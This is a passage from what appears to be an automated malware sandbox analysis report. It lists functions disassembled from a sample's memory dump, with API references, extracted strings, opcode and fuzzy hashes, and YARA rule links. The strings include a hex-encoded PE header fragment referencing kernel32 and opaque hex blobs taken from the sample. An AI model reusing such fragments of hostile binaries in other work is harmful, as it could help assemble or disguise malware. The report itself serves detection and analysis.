                                                                                                                                                          • Part of subcall function 0041D8A4: __CxxThrowException@8.LIBVCRUNTIME ref: 0041D8F7
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$DeallocateException@8Throwstd::_
                                                                                                                                                        • String ID: 2hA$Month number is out of range 1..12
                                                                                                                                                        • API String ID: 767510344-483880390
                                                                                                                                                        • Opcode ID: 377650b532c5a5941179669ae4e285718ef405bc4cedb8ee36969b5885ad3b32
                                                                                                                                                        • Instruction ID: 0f917c70bb08959ae5853aab361f5efad75bf10ab9a7e7d5d1e8aab95e5bcd7a
                                                                                                                                                        • Opcode Fuzzy Hash: 377650b532c5a5941179669ae4e285718ef405bc4cedb8ee36969b5885ad3b32
                                                                                                                                                        • Instruction Fuzzy Hash: BBE0EDB1850218AADB04FBA5D95ABEDBB74AF14308F50442DA201660D2DB781789C795
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041C244, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0041C249
                                                                                                                                                          • Part of subcall function 00413EAA: __EH_prolog.LIBCMT ref: 00413EAF
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                          • Part of subcall function 0041D8FD: __EH_prolog.LIBCMT ref: 0041D902
                                                                                                                                                          • Part of subcall function 0041D8FD: __CxxThrowException@8.LIBVCRUNTIME ref: 0041D950
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$DeallocateException@8Throwstd::_
                                                                                                                                                        • String ID: 2hA$Year is out of valid range: 1400..9999
                                                                                                                                                        • API String ID: 767510344-3686570063
                                                                                                                                                        • Opcode ID: 40f81829c3d84668ff37c444cd9b2c4ee4788cb342b529b5ccb3caf6e263b7bb
                                                                                                                                                        • Instruction ID: 95bf30f58c7a654497ed0b246a977fca473f008e9f7b1f07bbac91a704a442df
                                                                                                                                                        • Opcode Fuzzy Hash: 40f81829c3d84668ff37c444cd9b2c4ee4788cb342b529b5ccb3caf6e263b7bb
                                                                                                                                                        • Instruction Fuzzy Hash: 1BE0EDB1851218AADB08FBA5D96ABEDBBB4AF14708F50442CA201660D2DB781789C795
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041C292, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0041C297
                                                                                                                                                          • Part of subcall function 00413EAA: __EH_prolog.LIBCMT ref: 00413EAF
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                          • Part of subcall function 0041CF39: __EH_prolog.LIBCMT ref: 0041CF3E
                                                                                                                                                          • Part of subcall function 0041CF39: __CxxThrowException@8.LIBVCRUNTIME ref: 0041CF8C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$DeallocateException@8Throwstd::_
                                                                                                                                                        • String ID: 2hA$Day of month value is out of range 1..31
                                                                                                                                                        • API String ID: 767510344-3036547170
                                                                                                                                                        • Opcode ID: 253387ac6032946975d367c3ee22018720ee5fe47d64f6d594edec9b8fbdf474
                                                                                                                                                        • Instruction ID: 9057a6416d9578c5938dccb17733000f678ebf9e0ec962c15a0ce63da9c8cc16
                                                                                                                                                        • Opcode Fuzzy Hash: 253387ac6032946975d367c3ee22018720ee5fe47d64f6d594edec9b8fbdf474
                                                                                                                                                        • Instruction Fuzzy Hash: 20E0EDB1850218AADB04FBA1DA5ABEDBA74AF14708F10442CA201660C2DB781B89C7D5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040404B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 00404052
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 1.33$1.33
                                                                                                                                                        • API String ID: 4000879885-761529179
                                                                                                                                                        • Opcode ID: a91e455e12b932f45aaea1064944740416579cb0420d15c91b2a95871de9e66e
                                                                                                                                                        • Instruction ID: 334c7c6f38cec32f5cab1c73fc81847bbe7a2959a87ff75f0a31fc86d0c003eb
                                                                                                                                                        • Opcode Fuzzy Hash: a91e455e12b932f45aaea1064944740416579cb0420d15c91b2a95871de9e66e
                                                                                                                                                        • Instruction Fuzzy Hash: 7EC04C1799D53029258437583847CEF828E8E66721351067FB520652816D891E8703BE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00404025, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 0040402C
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 7576506552704f42$0x
                                                                                                                                                        • API String ID: 4000879885-2995838832
                                                                                                                                                        • Opcode ID: b94e89d49867521cbddd22e9013fc437c44acbfa9de87e95ad09a35351f55579
                                                                                                                                                        • Instruction ID: 221ad3c3f5fa79f72f57728981b5eea4e9889914c14cb478524573eb5434a83b
                                                                                                                                                        • Opcode Fuzzy Hash: b94e89d49867521cbddd22e9013fc437c44acbfa9de87e95ad09a35351f55579
                                                                                                                                                        • Instruction Fuzzy Hash: 3AC04C5695D53529258437597847CEF424F8D557243A1077FF610652816D891DC203BE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040225F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 00402266
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • ebba116b07da4cb63ae5330e63a497464cfbf18e8141362aa9edbfc053a5432f53038ca51cddf3fb227e77cd9a9f96526063757ecda6dd0e16f8dd4421c3d9ff9876c167e905bc7b3b6099c9c15bed52, xrefs: 00402260, 0040226D
                                                                                                                                                        • L,x, xrefs: 0040226E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: L,x$ebba116b07da4cb63ae5330e63a497464cfbf18e8141362aa9edbfc053a5432f53038ca51cddf3fb227e77cd9a9f96526063757ecda6dd0e16f8dd4421c3d9ff9876c167e905bc7b3b6099c9c15bed52
                                                                                                                                                        • API String ID: 4000879885-957484581
                                                                                                                                                        • Opcode ID: e892860e3bf1ccc05f13a95c9e2ffcdd41aa3c7ed91cee7c564552dfb964c1aa
                                                                                                                                                        • Instruction ID: 518b10508bc61fc7f4015957e700e453a6aca6dc64ea4a597648adcc8e0a66cf
                                                                                                                                                        • Opcode Fuzzy Hash: e892860e3bf1ccc05f13a95c9e2ffcdd41aa3c7ed91cee7c564552dfb964c1aa
                                                                                                                                                        • Instruction Fuzzy Hash: 27C04C2299D53029268832583C57DEF424E8D55321351066FB900652966DC91DC302BE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040A27D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 0040A284
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • 4D5A6B65726E656C33320000504500004C01030000000000000000000000000078000F030B01000000000000000000000000000014310000000000000C00000000004000001000000002000004000000010000000400000000000000A631000014010000000000000300000000001000001000000000000000000000000000000200, xrefs: 0040A27E, 0040A283, 0040A28B
                                                                                                                                                        • L5x, xrefs: 0040A28C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 4D5A6B65726E656C33320000504500004C01030000000000000000000000000078000F030B01000000000000000000000000000014310000000000000C00000000004000001000000002000004000000010000000400000000000000A631000014010000000000000300000000001000001000000000000000000000000000000200$L5x
                                                                                                                                                        • API String ID: 4000879885-1389143599
                                                                                                                                                        • Opcode ID: 0c5d86930ce4bc8df8087fbcaab28e717de05271f835e684fcf497df61cb9311
                                                                                                                                                        • Instruction ID: 972b32d1184b3afaf60cb84dae479d2c8900fd98364edd3671c9b96e4ea1ddee
                                                                                                                                                        • Opcode Fuzzy Hash: 0c5d86930ce4bc8df8087fbcaab28e717de05271f835e684fcf497df61cb9311
                                                                                                                                                        • Instruction Fuzzy Hash: 2BC04C5299D53029398832A83957CEB418E8D95721361166FF510652816D995DC206BD
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040A2C9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 0040A2D0
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 7576506552704f42$|5x
                                                                                                                                                        • API String ID: 4000879885-1717792503
                                                                                                                                                        • Opcode ID: d398875e2453b93eec85f93f4ed321221b7d12c97fc8fa11b73ce4e50b33accb
                                                                                                                                                        • Instruction ID: c6d84c83b60936ee15e31a43153b5df58c28e58cb578484bcf7694bb293b2f85
                                                                                                                                                        • Opcode Fuzzy Hash: d398875e2453b93eec85f93f4ed321221b7d12c97fc8fa11b73ce4e50b33accb
                                                                                                                                                        • Instruction Fuzzy Hash: BCC08C52C9E1302A21843228B803CEB018E8D45320361027FF540611816E880DC302FD
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040A2EF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 0040A2F6
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 1.33$1.33
                                                                                                                                                        • API String ID: 4000879885-761529179
                                                                                                                                                        • Opcode ID: 41b1291b21a903d8ed03f54da61d0c1b758034a4c8be88de91f51c7479bc9dac
                                                                                                                                                        • Instruction ID: 23c6a62fbf7070ae528f83094da091275c386195dfa0e140a59369addebc7ea2
                                                                                                                                                        • Opcode Fuzzy Hash: 41b1291b21a903d8ed03f54da61d0c1b758034a4c8be88de91f51c7479bc9dac
                                                                                                                                                        • Instruction Fuzzy Hash: FFC04C5299D5302D2588326C7847CEF828ECD66721355067FB51065181AD891DC202FD
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004022AB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 004022B2
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 1.33$1.33
                                                                                                                                                        • API String ID: 4000879885-761529179
                                                                                                                                                        • Opcode ID: 7421f72dcc309211afc22432a2b504f9e4e20eae1096a90d48495299a7b2ac4b
                                                                                                                                                        • Instruction ID: fee67894176f2cffeb8ea5941aed12752fc1ffc9e9098a0d1ef10b56acc5fa81
                                                                                                                                                        • Opcode Fuzzy Hash: 7421f72dcc309211afc22432a2b504f9e4e20eae1096a90d48495299a7b2ac4b
                                                                                                                                                        • Instruction Fuzzy Hash: 20C04C22A9D53029298432583C47CEF418E9D66321355067FF91165282AD891DC302FE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00408778, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 0040877F
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 1.33$1.33
                                                                                                                                                        • API String ID: 4000879885-761529179
                                                                                                                                                        • Opcode ID: 9816ae46dc066d38bcffc7ab7874c9353dc04f2d5c4ffc9c28fa440b9c58af78
                                                                                                                                                        • Instruction ID: e347847c8f2c0414e34e6aee7e5bda58f58ac38cb8e68bc3fd27117e74f58ece
                                                                                                                                                        • Opcode Fuzzy Hash: 9816ae46dc066d38bcffc7ab7874c9353dc04f2d5c4ffc9c28fa440b9c58af78
                                                                                                                                                        • Instruction Fuzzy Hash: A9C08C1289D0306A208432183C03CEF018E8D62320321027FF410A11816D881CC202BD
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00404951, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 00404958
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • 4D5A6B65726E656C33320000504500004C01030000000000000000000000000078000F030B01000000000000000000000000000014310000000000000C00000000004000001000000002000004000000010000000400000000000000A631000014010000000000000300000000001000001000000000000000000000000000000200, xrefs: 00404952, 0040495F
                                                                                                                                                        • \1x, xrefs: 00404960
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 4D5A6B65726E656C33320000504500004C01030000000000000000000000000078000F030B01000000000000000000000000000014310000000000000C00000000004000001000000002000004000000010000000400000000000000A631000014010000000000000300000000001000001000000000000000000000000000000200$\1x
                                                                                                                                                        • API String ID: 4000879885-713474139
                                                                                                                                                        • Opcode ID: 7699b0b6ff70cdd623f79cbbc1c9614a637914b79a10f99b00fe091a48514019
                                                                                                                                                        • Instruction ID: 90970ea461a42da346a4db953834a98eb101322387c92a5984e5bfc7de40c56f
                                                                                                                                                        • Opcode Fuzzy Hash: 7699b0b6ff70cdd623f79cbbc1c9614a637914b79a10f99b00fe091a48514019
                                                                                                                                                        • Instruction Fuzzy Hash: A0C04C13D9D934292984375C7847CEB415E8D56721351166FF500A5381AD896DC202BE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004049C3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 004049CA
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 1.33$1.33
                                                                                                                                                        • API String ID: 4000879885-761529179
                                                                                                                                                        • Opcode ID: 9de40c4f7a7946a48aa7309dfeefaef4d4579bdd0ed295958396071b34bff901
                                                                                                                                                        • Instruction ID: 255a4bd6693b74cd7b9425e0dcb584601c61693fd328d844ace45f402c33b612
                                                                                                                                                        • Opcode Fuzzy Hash: 9de40c4f7a7946a48aa7309dfeefaef4d4579bdd0ed295958396071b34bff901
                                                                                                                                                        • Instruction Fuzzy Hash: 51C04C13D9D53429258432583C47CEF829E8D6672135507BFB950A52856D895DC602BE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00402B50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 00402B57
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 7576506552704f42$<-x
                                                                                                                                                        • API String ID: 4000879885-2497870702
                                                                                                                                                        • Opcode ID: 8d781947bc6c9b9d04bfd9b58ca4a39583f60aa0bc453267441c34e1eca7af2f
                                                                                                                                                        • Instruction ID: d8fb7417f40cd2e084e5e33f608d10706e1d811b23730c72ed18a2d0aafd43ad
                                                                                                                                                        • Opcode Fuzzy Hash: 8d781947bc6c9b9d04bfd9b58ca4a39583f60aa0bc453267441c34e1eca7af2f
                                                                                                                                                        • Instruction Fuzzy Hash: 23C04C63A5D6302925883258BC47CEB425E8D55325365067FF950652826D891D8302BE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040AB6E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 0040AB75
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • $6x, xrefs: 0040AB7D
                                                                                                                                                        • ebba116b07da4cb63ae5330e63a497464cfbf18e8141362aa9edbfc053a5432f53038ca51cddf3fb227e77cd9a9f96526063757ecda6dd0e16f8dd4421c3d9ff9876c167e905bc7b3b6099c9c15bed52, xrefs: 0040AB6F, 0040AB74, 0040AB7C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: $6x$ebba116b07da4cb63ae5330e63a497464cfbf18e8141362aa9edbfc053a5432f53038ca51cddf3fb227e77cd9a9f96526063757ecda6dd0e16f8dd4421c3d9ff9876c167e905bc7b3b6099c9c15bed52
                                                                                                                                                        • API String ID: 4000879885-3106190698
                                                                                                                                                        • Opcode ID: 8eed7faec43657384eb7c9e02ca1952850934b777d903976eac1a29b55ac5a03
                                                                                                                                                        • Instruction ID: 005e33ed559f2cbdb538bfd0d45d5054034873f76a571432fe6b7dc315890976
                                                                                                                                                        • Opcode Fuzzy Hash: 8eed7faec43657384eb7c9e02ca1952850934b777d903976eac1a29b55ac5a03
                                                                                                                                                        • Instruction Fuzzy Hash: BAC04C6299D5312A2585365C3C47CEB418E8D667243560A7FB500652856D991D8202BE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00402B76, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 00402B7D
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 1.33$1.33
                                                                                                                                                        • API String ID: 4000879885-761529179
                                                                                                                                                        • Opcode ID: 47e33747047496746059018fef52f2b57b700b7c6f27507083c763b1a0f04a0a
                                                                                                                                                        • Instruction ID: a4d21a1c80503b4bc04d1b628bdad13e859761bf5fe91ec9a87aadef61c6b742
                                                                                                                                                        • Opcode Fuzzy Hash: 47e33747047496746059018fef52f2b57b700b7c6f27507083c763b1a0f04a0a
                                                                                                                                                        • Instruction Fuzzy Hash: F3C04C22A9D53429258932697847CEF41CECD66321355077FB910662826D892DC702BE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040CB27, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 0040CB2E
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 1.33$1.33
                                                                                                                                                        • API String ID: 4000879885-761529179
                                                                                                                                                        • Opcode ID: 9bbefbc2ac59cea0ec1043821fea42e67ec308258a1069f6ede708ba65fb63cb
                                                                                                                                                        • Instruction ID: d4eb6d7883f2a89999d2db4ec6593da39b7f49c092d09c87e7fcf1fe08694c2b
                                                                                                                                                        • Opcode Fuzzy Hash: 9bbefbc2ac59cea0ec1043821fea42e67ec308258a1069f6ede708ba65fb63cb
                                                                                                                                                        • Instruction Fuzzy Hash: C8C04C5699E53029258432593847CEF418E8D66721351077FF510652816D995DC202BD
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00402B2A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 00402B31
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • -x, xrefs: 00402B39
                                                                                                                                                        • ebba116b07da4cb63ae5330e63a497464cfbf18e8141362aa9edbfc053a5432f53038ca51cddf3fb227e77cd9a9f96526063757ecda6dd0e16f8dd4421c3d9ff9876c167e905bc7b3b6099c9c15bed52, xrefs: 00402B2B, 00402B38
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: ebba116b07da4cb63ae5330e63a497464cfbf18e8141362aa9edbfc053a5432f53038ca51cddf3fb227e77cd9a9f96526063757ecda6dd0e16f8dd4421c3d9ff9876c167e905bc7b3b6099c9c15bed52$-x
                                                                                                                                                        • API String ID: 4000879885-4084831433
                                                                                                                                                        • Opcode ID: beafc64d84d7510b4100caaec8acd72ae3e66ef07b6c534b2c2d0b05f7869d39
